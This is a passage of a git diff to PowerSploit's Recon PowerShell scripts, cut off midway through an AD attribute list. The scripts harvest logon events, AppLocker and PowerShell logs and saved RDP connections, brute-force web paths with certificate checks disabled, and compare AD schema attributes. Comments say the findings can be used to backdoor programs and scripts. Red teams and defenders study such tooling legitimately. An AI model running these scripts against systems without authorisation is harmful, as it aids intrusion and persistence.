aboutsummaryrefslogtreecommitdiff
path: root/Recon
diff options
context:
space:
mode:
Diffstat (limited to 'Recon')
-rw-r--r--Recon/Get-ComputerDetail.ps1 (renamed from Recon/Get-ComputerDetails.ps1)106
-rw-r--r--Recon/Get-HttpStatus.ps162
-rw-r--r--Recon/Invoke-CompareAttributesForClass.ps11044
-rw-r--r--Recon/Invoke-Portscan.ps134
-rw-r--r--Recon/Invoke-ReverseDnsLookup.ps184
-rwxr-xr-xRecon/PowerView.ps123767
-rw-r--r--Recon/README.md165
-rw-r--r--Recon/Recon.psd1142
8 files changed, 16759 insertions, 8645 deletions
diff --git a/Recon/Get-ComputerDetails.ps1 b/Recon/Get-ComputerDetail.ps1
index bd00deb..ef3720c 100644
--- a/Recon/Get-ComputerDetails.ps1
+++ b/Recon/Get-ComputerDetail.ps1
@@ -1,14 +1,14 @@
-function Get-ComputerDetails
+function Get-ComputerDetail
{
<#
.SYNOPSIS
This script is used to get useful information from a computer.
-Function: Get-ComputerDetails
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Get-ComputerDetail
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
@@ -25,14 +25,14 @@ Switch: Outputs the data as text instead of objects, good if you are using this
.EXAMPLE
-Get-ComputerDetails
+Get-ComputerDetail
Gets information about the computer and outputs it as PowerShell objects.
-Get-ComputerDetails -ToString
+Get-ComputerDetail -ToString
Gets information about the computer and outputs it as raw text.
.NOTES
-This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
+This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
.LINK
@@ -42,6 +42,7 @@ Github repo: https://github.com/clymb3r/PowerShell
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
Param(
[Parameter(Position=0)]
[Switch]
@@ -50,14 +51,12 @@ Github repo: https://github.com/clymb3r/PowerShell
Set-StrictMode -Version 2
-
-
$SecurityLog = Get-EventLog -LogName Security
- $Filtered4624 = Find-4624Logons $SecurityLog
- $Filtered4648 = Find-4648Logons $SecurityLog
- $AppLockerLogs = Find-AppLockerLogs
+ $Filtered4624 = Find-4624Logon $SecurityLog
+ $Filtered4648 = Find-4648Logon $SecurityLog
+ $AppLockerLogs = Find-AppLockerLog
$PSLogs = Find-PSScriptsInPSAppLog
- $RdpClientData = Find-RDPClientConnections
+ $RdpClientData = Find-RDPClientConnection
if ($ToString)
{
@@ -88,29 +87,29 @@ Github repo: https://github.com/clymb3r/PowerShell
}
-function Find-4648Logons
+function Find-4648Logon
{
<#
.SYNOPSIS
-Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
+Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
-Function: Find-4648Logons
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-4648Logon
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
-Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
+Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
.EXAMPLE
-Find-4648Logons
+Find-4648Logon
Gets the unique 4648 logon events.
.NOTES
@@ -120,11 +119,12 @@ Gets the unique 4648 logon events.
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
+
Param(
$SecurityLog
)
- $ExplicitLogons = $SecurityLog | Where {$_.InstanceID -eq 4648}
+ $ExplicitLogons = $SecurityLog | Where-Object {$_.InstanceID -eq 4648}
$ReturnInfo = @{}
foreach ($ExplicitLogon in $ExplicitLogons)
@@ -216,7 +216,7 @@ Github repo: https://github.com/clymb3r/PowerShell
return $ReturnInfo
}
-function Find-4624Logons
+function Find-4624Logon
{
<#
.SYNOPSIS
@@ -224,10 +224,10 @@ function Find-4624Logons
Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do
network logons in to the server, what accounts RDP in, what accounts log in locally, etc...
-Function: Find-4624Logons
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-4624Logon
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
@@ -236,7 +236,7 @@ network logons in to the server, what accounts RDP in, what accounts log in loca
.EXAMPLE
-Find-4624Logons
+Find-4624Logon
Find unique 4624 logon events.
.NOTES
@@ -250,7 +250,7 @@ Github repo: https://github.com/clymb3r/PowerShell
$SecurityLog
)
- $Logons = $SecurityLog | Where {$_.InstanceID -eq 4624}
+ $Logons = $SecurityLog | Where-Object {$_.InstanceID -eq 4624}
$ReturnInfo = @{}
foreach ($Logon in $Logons)
@@ -362,17 +362,17 @@ Github repo: https://github.com/clymb3r/PowerShell
}
-function Find-AppLockerLogs
+function Find-AppLockerLog
{
<#
.SYNOPSIS
Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run).
-Function: Find-AppLockerLogs
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-AppLockerLog
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
@@ -380,7 +380,7 @@ Look through the AppLocker logs to find processes that get run on the server. Yo
.EXAMPLE
-Find-AppLockerLogs
+Find-AppLockerLog
Find process creations from AppLocker logs.
.NOTES
@@ -390,9 +390,10 @@ Find process creations from AppLocker logs.
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
+
$ReturnInfo = @{}
- $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where {$_.Id -eq 8002}
+ $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 8002}
foreach ($Log in $AppLockerLogs)
{
@@ -434,10 +435,10 @@ Function Find-PSScriptsInPSAppLog
Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log).
You can then backdoor these scripts or do other malicious things.
-Function: Find-AppLockerLogs
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-AppLockerLog
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
@@ -456,12 +457,12 @@ Find unique PowerShell scripts being executed from the PowerShell operational lo
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
+
$ReturnInfo = @{}
- $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where {$_.Id -eq 4100}
+ $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 4100}
foreach ($Log in $Logs)
{
- $ContainsScriptName = $false
$LogDetails = $Log.Message -split "`r`n"
$FoundScriptName = $false
@@ -506,27 +507,26 @@ Github repo: https://github.com/clymb3r/PowerShell
}
-Function Find-RDPClientConnections
+Function Find-RDPClientConnection
{
<#
.SYNOPSIS
-Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user
+Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user
usually RDP's to.
-Function: Find-RDPClientConnections
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-RDPClientConnection
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
-Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user
-usually RDP's to.
+Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user usually RDP's to.
.EXAMPLE
-Find-RDPClientConnections
+Find-RDPClientConnection
Find unique saved RDP client connections.
.NOTES
@@ -550,7 +550,7 @@ Github repo: https://github.com/clymb3r/PowerShell
{
$Server = $Server.PSChildName
$UsernameHint = (Get-ItemProperty -Path "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers\$($Server)").UsernameHint
-
+
$Key = $UserSid + "::::" + $Server + "::::" + $UsernameHint
if (!$ReturnInfo.ContainsKey($Key))
diff --git a/Recon/Get-HttpStatus.ps1 b/Recon/Get-HttpStatus.ps1
index 8b60306..b271efd 100644
--- a/Recon/Get-HttpStatus.ps1
+++ b/Recon/Get-HttpStatus.ps1
@@ -5,11 +5,11 @@ function Get-HttpStatus
Returns the HTTP Status Codes and full URL for specified paths.
-PowerSploit Function: Get-HttpStatus
-Author: Chris Campbell (@obscuresec)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Get-HttpStatus
+Author: Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
@@ -42,7 +42,7 @@ C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
.NOTES
HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
-
+
.LINK
http://obscuresecurity.blogspot.com
@@ -64,49 +64,54 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
[Switch]
$UseSSL
)
-
+
if (Test-Path $Path) {
-
+
if ($UseSSL -and $Port -eq 0) {
# Default to 443 if SSL is specified but no port is specified
$Port = 443
- } elseif ($Port -eq 0) {
+ }
+ elseif ($Port -eq 0) {
# Default to port 80 if no port is specified
$Port = 80
}
-
+
$TcpConnection = New-Object System.Net.Sockets.TcpClient
Write-Verbose "Path Test Succeeded - Testing Connectivity"
-
+
try {
# Validate that the host is listening before scanning
$TcpConnection.Connect($Target, $Port)
- } catch {
+ }
+ catch {
Write-Error "Connection Test Failed - Check Target"
$Tcpconnection.Close()
- Return
+ Return
}
-
+
$Tcpconnection.Close()
- } else {
+ }
+ else {
Write-Error "Path Test Failed - Check Dictionary Path"
Return
}
-
+
if ($UseSSL) {
$SSL = 's'
# Ignore invalid SSL certificates
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
- } else {
+ }
+ else {
$SSL = ''
}
-
+
if (($Port -eq 80) -or ($Port -eq 443)) {
$PortNum = ''
- } else {
+ }
+ else {
$PortNum = ":$Port"
}
-
+
# Check Http status for each entry in the doctionary file
foreach ($Item in Get-Content $Path) {
@@ -117,24 +122,23 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
$WebRequest = [System.Net.WebRequest]::Create($URI)
$WebResponse = $WebRequest.GetResponse()
$WebStatus = $WebResponse.StatusCode
- $ResultObject += $ScanObject
$WebResponse.Close()
- } catch {
+ }
+ catch {
$WebStatus = $Error[0].Exception.InnerException.Response.StatusCode
-
- if ($WebStatus -eq $null) {
+
+ if (-not $WebStatus) {
# Not every exception returns a StatusCode.
# If that is the case, return the Status.
$WebStatus = $Error[0].Exception.InnerException.Status
}
- }
-
+ }
+
$Result = @{ Status = $WebStatus;
URL = $WebTarget}
-
+
$ScanObject = New-Object -TypeName PSObject -Property $Result
-
+
Write-Output $ScanObject
-
}
}
diff --git a/Recon/Invoke-CompareAttributesForClass.ps1 b/Recon/Invoke-CompareAttributesForClass.ps1
new file mode 100644
index 0000000..b2d11c6
--- /dev/null
+++ b/Recon/Invoke-CompareAttributesForClass.ps1
@@ -0,0 +1,1044 @@
+function Get-AllAttributesForClass
+{<#
+.Synopsis
+ Gets all AD Schema attributes for class
+.DESCRIPTION
+ This function will get all attributes for a class from AD.
+.EXAMPLE
+ PS C:\> Get-AllAttributesForAClass -class user
+.EXAMPLE
+ PS C:\> Get-AllAttributesForAClass -class computer
+#>
+ [CmdletBinding()]
+ Param(
+ [Parameter(Mandatory=$true)]
+ [String]
+ $Class
+ )
+
+ Process {
+ #Custom object
+ $ListOfAttributesFromAD = @()
+
+ #lets get all classes and store in a variable.
+ $NextClass = $Class
+ $AllClasses = Do
+ {
+ $CurrentClass = $NextClass
+ $NextClass = Get-ADObject -SearchBase "$((Get-ADRootDSE).SchemaNamingContext)" -Filter {lDAPDisplayName -eq $NextClass} -properties subClassOf |Select-Object -ExpandProperty subClassOf
+ $CurrentClass
+ }
+ While($CurrentClass -ne $NextClass)
+ #Now that we have our classes in $allClasses lets turn to the attributes
+ $attributAttributes = 'MayContain','MustContain','systemMayContain','systemMustContain'
+ Write-verbose "Attempting to find all attributes for the AD Object: $($ADObj.Name)"
+ $AllAttributes = ForEach ($Class in $AllClasses)
+ {
+ $ClassInfo = Get-ADObject -SearchBase "$((Get-ADRootDSE).SchemaNamingContext)" -Filter {lDAPDisplayName -eq $Class} -properties $attributAttributes
+ ForEach ($attribute in $attributAttributes)
+ {
+ $ListOfAttributesFromAD += $ClassInfo.$attribute
+ $ClassInfo.$attribute
+ }
+ }
+ $ListOfAttributesAD = $ListOfAttributesFromAD | Sort-Object -Unique
+ write-output $ListOfAttributesAD
+ }
+ End
+ {
+ }
+}
+
+
+function Invoke-CompareAttributesForClass
+{
+<#
+.Synopsis
+ Author: @oddvarmoe
+ Required Dependencies: Search-ADAccounts, Set-ADComputer, Get-ADForest, Get-ADDomain,
+ Optional Dependencies: None
+ Compares list of attributes with active attributes in Active Directory. Currently only works with user and computer class.
+
+.DESCRIPTION
+ Compares list of attributes with active attributes in Active Directory.
+ This function is used to spot unusal attributes.
+
+ Example where an attribute is found in AD and not in compare list:
+ InputObject SideIndicator
+ ----------- -------------
+ TopSecretAttribute =>
+
+
+.EXAMPLE
+ PS C:\> Invoke-CompareAttributesForClass -Class user
+
+.EXAMPLE
+ PS C:\> Invoke-CompareAttributesForClass -Class computer
+#>
+ [CmdletBinding()]
+ Param(
+ [Parameter(Mandatory=$true)]
+ [ValidateSet("User","Computer")]
+ [String]
+ $Class
+ )
+
+ Process {
+ #https://msdn.microsoft.com/en-us/library/ms683980(v=vs.85).aspx
+ #List of attributes generated from demo AD with Exchange schema changes on Server 2016 DC
+ #TODO: Attributes based on AD Domain level or Schema version.
+ if($Class -eq "user"){
+ $UserAttributeListFromAD = Get-AllAttributesForClass -Class user
+
+ $UserAttributelist = @(
+ "accountExpires",
+ "aCSPolicyName",
+ "adminCount",
+ "adminDescription",
+ "adminDisplayName",
+ "allowedAttributes",
+ "allowedAttributesEffective",
+ "allowedChildClasses",
+ "allowedChildClassesEffective",
+ "assistant",
+ "attributeCertificateAttribute",
+ "audio",
+ "badPasswordTime",
+ "badPwdCount",
+ "bridgeheadServerListBL",
+ "businessCategory",
+ "businessRoles",
+ "c",
+ "canonicalName",
+ "carLicense",
+ "cn",
+ "co",
+ "codePage",
+ "comment",
+ "company",
+ "controlAccessRights",
+ "countryCode",
+ "createTimeStamp",
+ "dBCSPwd",
+ "defaultClassStore",
+ "department",
+ "departmentNumber",
+ "description",
+ "desktopProfile",
+ "destinationIndicator",
+ "directReports",
+ "displayName",
+ "displayNamePrintable",
+ "distinguishedName",
+ "division",
+ "dSASignature",
+ "dSCorePropagationData",
+ "dynamicLDAPServer",
+ "employeeID",
+ "employeeNumber",
+ "employeeType",
+ "extensionName",
+ "facsimileTelephoneNumber",
+ "flags",
+ "fromEntry",
+ "frsComputerReferenceBL",
+ "fRSMemberReferenceBL",
+ "fSMORoleOwner",
+ "generationQualifier",
+ "givenName",
+ "groupMembershipSAM",
+ "groupPriority",
+ "groupsToIgnore",
+ "homeDirectory",
+ "homeDrive",
+ "homePhone",
+ "homePostalAddress",
+ "houseIdentifier",
+ "initials",
+ "instanceType",
+ "internationalISDNNumber",
+ "ipPhone",
+ "isCriticalSystemObject",
+ "isDeleted",
+ "isPrivilegeHolder",
+ "isRecycled",
+ "jpegPhoto",
+ "kMServer",
+ "l",
+ "labeledURI",
+ "lastKnownParent",
+ "lastLogoff",
+ "lastLogon",
+ "lastLogonTimestamp",
+ "lmPwdHistory",
+ "localeID",
+ "lockoutTime",
+ "logonCount",
+ "logonHours",
+ "logonWorkstation",
+ "mail",
+ "managedObjects",
+ "manager",
+ "masteredBy",
+ "maxStorage",
+ "memberOf",
+ "mhsORAddress",
+ "middleName",
+ "mobile",
+ "modifyTimeStamp",
+ "msCOM-PartitionSetLink",
+ "msCOM-UserLink",
+ "msCOM-UserPartitionSetLink",
+ "msDFSR-ComputerReferenceBL",
+ "msDFSR-MemberReferenceBL",
+ "msDRM-IdentityCertificate",
+ "msDS-AllowedToActOnBehalfOfOtherIdentity",
+ "msDS-AllowedToDelegateTo",
+ "msDS-Approx-Immed-Subordinates",
+ "msDS-AssignedAuthNPolicy",
+ "msDS-AssignedAuthNPolicySilo",
+ "msDS-AuthenticatedAtDC",
+ "msDS-AuthenticatedToAccountlist",
+ "msDS-AuthNPolicySiloMembersBL",
+ "msDS-Cached-Membership",
+ "msDS-Cached-Membership-Time-Stamp",
+ "msDS-ClaimSharesPossibleValuesWithBL",
+ "msDS-CloudAnchor",
+ "mS-DS-ConsistencyChildCount",
+ "mS-DS-ConsistencyGuid",
+ "mS-DS-CreatorSID",
+ "msDS-EnabledFeatureBL",
+ "msDS-FailedInteractiveLogonCount",
+ "msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon",
+ "msDS-HABSeniorityIndex",
+ "msDS-HostServiceAccountBL",
+ "msDS-IsDomainFor",
+ "msDS-IsFullReplicaFor",
+ "msDS-IsPartialReplicaFor",
+ "msDS-IsPrimaryComputerFor",
+ "msDS-KeyCredentialLink",
+ "msDS-KeyPrincipalBL",
+ "msDS-KrbTgtLinkBl",
+ "msDS-LastFailedInteractiveLogonTime",
+ "msDS-LastKnownRDN",
+ "msDS-LastSuccessfulInteractiveLogonTime",
+ "msDS-LocalEffectiveDeletionTime",
+ "msDS-LocalEffectiveRecycleTime",
+ "msDs-masteredBy",
+ "msds-memberOfTransitive",
+ "msDS-MembersForAzRoleBL",
+ "msDS-MembersOfResourcePropertyListBL",
+ "msds-memberTransitive",
+ "msDS-NCReplCursors",
+ "msDS-NCReplInboundNeighbors",
+ "msDS-NCReplOutboundNeighbors",
+ "msDS-NC-RO-Replica-Locations-BL",
+ "msDS-NcType",
+ "msDS-NonMembersBL",
+ "msDS-ObjectReferenceBL",
+ "msDS-ObjectSoa",
+ "msDS-OIDToGroupLinkBl",
+ "msDS-OperationsForAzRoleBL",
+ "msDS-OperationsForAzTaskBL",
+ "msDS-parentdistname",
+ "msDS-PhoneticCompanyName",
+ "msDS-PhoneticDepartment",
+ "msDS-PhoneticDisplayName",
+ "msDS-PhoneticFirstName",
+ "msDS-PhoneticLastName",
+ "msDS-PrimaryComputer",
+ "msDS-PrincipalName",
+ "msDS-PSOApplied",
+ "msDS-ReplAttributeMetaData",
+ "msDS-ReplValueMetaData",
+ "msDS-ReplValueMetaDataExt",
+ "msDS-ResultantPSO",
+ "msDS-RevealedDSAs",
+ "msDS-RevealedListBL",
+ "msDS-SecondaryKrbTgtNumber",
+ "msDS-Site-Affinity",
+ "msDS-SourceAnchor",
+ "msDS-SourceObjectDN",
+ "msDS-SupportedEncryptionTypes",
+ "msDS-SyncServerUrl",
+ "msDS-TasksForAzRoleBL",
+ "msDS-TasksForAzTaskBL",
+ "msDS-TDOEgressBL",
+ "msDS-TDOIngressBL",
+ "msDS-User-Account-Control-Computed",
+ "msDS-UserPasswordExpiryTimeComputed",
+ "msDS-ValueTypeReferenceBL",
+ "msExchAcceptedDomainBL",
+ "msExchAccountForestBL",
+ "msExchArchiveDatabaseBL",
+ "msExchAssociatedAcceptedDomainBL",
+ "msExchAuthPolicyBL",
+ "msExchAuxMailboxParentObjectIdBL",
+ "msExchAvailabilityOrgWideAccountBL",
+ "msExchAvailabilityPerUserAccountBL",
+ "msExchCatchAllRecipientBL",
+ "msExchConferenceMailboxBL",
+ "msExchControllingZone",
+ "msExchDataEncryptionPolicyBL",
+ "msExchDelegateListBL",
+ "msExchDeviceAccessControlRuleBL",
+ "msExchEvictedMemebersBL",
+ "msExchHABRootDepartmentBL",
+ "msExchHouseIdentifier",
+ "msExchHygieneConfigurationMalwareBL",
+ "msExchHygieneConfigurationSpamBL",
+ "msExchIMAPOWAURLPrefixOverride",
+ "msExchIntendedMailboxPlanBL",
+ "msExchMailboxMoveSourceArchiveMDBBL",
+ "msExchMailboxMoveSourceMDBBL",
+ "msExchMailboxMoveSourceUserBL",
+ "msExchMailboxMoveStorageMDBBL",
+ "msExchMailboxMoveTargetArchiveMDBBL",
+ "msExchMailboxMoveTargetMDBBL",
+ "msExchMailboxMoveTargetUserBL",
+ "msExchMDBAvailabilityGroupConfigurationBL",
+ "msExchMobileRemoteDocumentsAllowedServersBL",
+ "msExchMobileRemoteDocumentsBlockedServersBL",
+ "msExchMobileRemoteDocumentsInternalDomainSuffixListBL",
+ "msExchMultiMailboxDatabasesBL",
+ "msExchMultiMailboxLocationsBL",
+ "msExchOABGeneratingMailboxBL",
+ "msExchOrganizationsAddressBookRootsBL",
+ "msExchOrganizationsGlobalAddressListsBL",
+ "msExchOrganizationsTemplateRootsBL",
+ "msExchOriginatingForest",
+ "msExchOWAAllowedFileTypesBL",
+ "msExchOWAAllowedMimeTypesBL",
+ "msExchOWABlockedFileTypesBL",
+ "msExchOWABlockedMIMETypesBL",
+ "msExchOWAForceSaveFileTypesBL",
+ "msExchOWAForceSaveMIMETypesBL",
+ "msExchOWARemoteDocumentsAllowedServersBL",
+ "msExchOWARemoteDocumentsBlockedServersBL",
+ "msExchOWARemoteDocumentsInternalDomainSuffixListBL",
+ "msExchOWATranscodingFileTypesBL",
+ "msExchOWATranscodingMimeTypesBL",
+ "msExchParentPlanBL",
+ "msExchQueryBaseDN",
+ "msExchRBACPolicyBL",
+ "msExchResourceGUID",
+ "msExchResourceProperties",
+ "msExchRMSComputerAccountsBL",
+ "msExchServerAssociationBL",
+ "msExchServerSiteBL",
+ "msExchSMTPReceiveDefaultAcceptedDomainBL",
+ "msExchSupervisionDLBL",
+ "msExchSupervisionOneOffBL",
+ "msExchSupervisionUserBL",
+ "msExchTransportRuleTargetBL",
+ "msExchTrustedDomainBL",
+ "msExchUGMemberBL",
+ "msExchUserBL",
+ "msExchUserCulture",
+ "msIIS-FTPDir",
+ "msIIS-FTPRoot",
+ "mSMQDigests",
+ "mSMQDigestsMig",
+ "mSMQSignCertificates",
+ "mSMQSignCertificatesMig",
+ "msNPAllowDialin",
+ "msNPCallingStationID",
+ "msNPSavedCallingStationID",
+ "msOrg-LeadersBL",
+ "msPKIAccountCredentials",
+ "msPKI-CredentialRoamingTokens",
+ "msPKIDPAPIMasterKeys",
+ "msPKIRoamingTimeStamp",
+ "msRADIUSCallbackNumber",
+ "msRADIUS-FramedInterfaceId",
+ "msRADIUSFramedIPAddress",
+ "msRADIUS-FramedIpv6Prefix",
+ "msRADIUS-FramedIpv6Route",
+ "msRADIUSFramedRoute",
+ "msRADIUS-SavedFramedInterfaceId",
+ "msRADIUS-SavedFramedIpv6Prefix",
+ "msRADIUS-SavedFramedIpv6Route",
+ "msRADIUSServiceType",
+ "msRASSavedCallbackNumber",
+ "msRASSavedFramedIPAddress",
+ "msRASSavedFramedRoute",
+ "msRTCSIP-AcpInfo",
+ "msRTCSIP-ApplicationOptions",
+ "msRTCSIP-ArchivingEnabled",
+ "msRTCSIP-DeploymentLocator",
+ "msRTCSIP-FederationEnabled",
+ "msRTCSIP-GroupingID",
+ "msRTCSIP-InternetAccessEnabled",
+ "msRTCSIP-Line",
+ "msRTCSIP-LineServer",
+ "msRTCSIP-OptionFlags",
+ "msRTCSIP-OriginatorSid",
+ "msRTCSIP-OwnerUrn",
+ "msRTCSIP-PrimaryHomeServer",
+ "msRTCSIP-PrimaryUserAddress",
+ "msRTCSIP-PrivateLine",
+ "msRTCSIP-TargetHomeServer",
+ "msRTCSIP-TargetUserPolicies",
+ "msRTCSIP-TenantId",
+ "msRTCSIP-UserEnabled",
+ "msRTCSIP-UserExtension",
+ "msRTCSIP-UserLocationProfile",
+ "msRTCSIP-UserPolicies",
+ "msRTCSIP-UserPolicy",
+ "msRTCSIP-UserRoutingGroupId",
+ "msSFU30Name",
+ "msSFU30NisDomain",
+ "msSFU30PosixMemberOf",
+ "msTSAllowLogon",
+ "msTSBrokenConnectionAction",
+ "msTSConnectClientDrives",
+ "msTSConnectPrinterDrives",
+ "msTSDefaultToMainPrinter",
+ "msTSExpireDate",
+ "msTSExpireDate2",
+ "msTSExpireDate3",
+ "msTSExpireDate4",
+ "msTSHomeDirectory",
+ "msTSHomeDrive",
+ "msTSInitialProgram",
+ "msTSLicenseVersion",
+ "msTSLicenseVersion2",
+ "msTSLicenseVersion3",
+ "msTSLicenseVersion4",
+ "msTSLSProperty01",
+ "msTSLSProperty02",
+ "msTSManagingLS",
+ "msTSManagingLS2",
+ "msTSManagingLS3",
+ "msTSManagingLS4",
+ "msTSMaxConnectionTime",
+ "msTSMaxDisconnectionTime",
+ "msTSMaxIdleTime",
+ "msTSPrimaryDesktop",
+ "msTSProfilePath",
+ "msTSProperty01",
+ "msTSProperty02",
+ "msTSReconnectionAction",
+ "msTSRemoteControl",
+ "msTSSecondaryDesktops",
+ "msTSWorkDirectory",
+ "name",
+ "netbootSCPBL",
+ "networkAddress",
+ "nonSecurityMemberBL",
+ "ntPwdHistory",
+ "nTSecurityDescriptor",
+ "o",
+ "objectCategory",
+ "objectClass",
+ "objectGUID",
+ "objectVersion",
+ "operatorCount",
+ "otherFacsimileTelephoneNumber",
+ "otherHomePhone",
+ "otherIpPhone",
+ "otherLoginWorkstations",
+ "otherMailbox",
+ "otherMobile",
+ "otherPager",
+ "otherTelephone",
+ "otherWellKnownObjects",
+ "ou",
+ "ownerBL",
+ "pager",
+ "partialAttributeDeletionList",
+ "partialAttributeSet",
+ "personalPager",
+ "personalTitle",
+ "photo",
+ "physicalDeliveryOfficeName",
+ "possibleInferiors",
+ "postalAddress",
+ "postalCode",
+ "postOfficeBox",
+ "preferredDeliveryMethod",
+ "preferredLanguage",
+ "preferredOU",
+ "primaryGroupID",
+ "primaryInternationalISDNNumber",
+ "primaryTelexNumber",
+ "profilePath",
+ "proxiedObjectName",
+ "proxyAddresses",
+ "pwdLastSet",
+ "queryPolicyBL",
+ "registeredAddress",
+ "replPropertyMetaData",
+ "replUpToDateVector",
+ "repsFrom",
+ "repsTo",
+ "revision",
+ "roomNumber",
+ "scriptPath",
+ "sDRightsEffective",
+ "secretary",
+ "seeAlso",
+ "serialNumber",
+ "serverReferenceBL",
+ "servicePrincipalName",
+ "showInAdvancedViewOnly",
+ "siteObjectBL",
+ "sn",
+ "st",
+ "street",
+ "streetAddress",
+ "structuralObjectClass",
+ "subRefs",
+ "subSchemaSubEntry",
+ "systemFlags",
+ "telephoneAssistant",
+ "telephoneNumber",
+ "teletexTerminalIdentifier",
+ "telexNumber",
+ "terminalServer",
+ "thumbnailLogo",
+ "thumbnailPhoto",
+ "title",
+ "uid",
+ "unicodePwd",
+ "url",
+ "userAccountControl",
+ "userCertificate",
+ "userParameters",
+ "userPassword",
+ "userPKCS12",
+ "userPrincipalName",
+ "userSharedFolder",
+ "userSharedFolderOther",
+ "userSMIMECertificate",
+ "userWorkstations",
+ "uSNChanged",
+ "uSNCreated",
+ "uSNDSALastObjRemoved",
+ "USNIntersite",
+ "uSNLastObjRem",
+ "uSNSource",
+ "wbemPath",
+ "wellKnownObjects",
+ "whenChanged",
+ "whenCreated",
+ "wWWHomePage",
+ "x121Address",
+ "x500uniqueIdentifier"
+ )
+ $Compare = Compare-Object -ReferenceObject $UserAttributelist -DifferenceObject $UserAttributeListFromAD
+ Write-Output $Compare
+ }
+
+ if($Class -eq "computer"){
+ $ComputerAttributeListFromAD = Get-AllAttributesForClass -Class computer
+
+ $ComputerAttributeList = @(
+ "accountExpires",
+ "aCSPolicyName",
+ "adminCount",
+ "adminDescription",
+ "adminDisplayName",
+ "allowedAttributes",
+ "allowedAttributesEffective",
+ "allowedChildClasses",
+ "allowedChildClassesEffective",
+ "assistant",
+ "attributeCertificateAttribute",
+ "audio",
+ "badPasswordTime",
+ "badPwdCount",
+ "bridgeheadServerListBL",
+ "businessCategory",
+ "businessRoles",
+ "c",
+ "canonicalName",
+ "carLicense",
+ "catalogs",
+ "cn",
+ "co",
+ "codePage",
+ "comment",
+ "company",
+ "controlAccessRights",
+ "countryCode",
+ "createTimeStamp",
+ "dBCSPwd",
+ "defaultClassStore",
+ "defaultLocalPolicyObject",
+ "department",
+ "departmentNumber",
+ "description",
+ "desktopProfile",
+ "destinationIndicator",
+ "directReports",
+ "displayName",
+ "displayNamePrintable",
+ "distinguishedName",
+ "division",
+ "dNSHostName",
+ "dSASignature",
+ "dSCorePropagationData",
+ "dynamicLDAPServer",
+ "employeeID",
+ "employeeNumber",
+ "employeeType",
+ "extensionName",
+ "facsimileTelephoneNumber",
+ "flags",
+ "fromEntry",
+ "frsComputerReferenceBL",
+ "fRSMemberReferenceBL",
+ "fSMORoleOwner",
+ "generationQualifier",
+ "givenName",
+ "groupMembershipSAM",
+ "groupPriority",
+ "groupsToIgnore",
+ "homeDirectory",
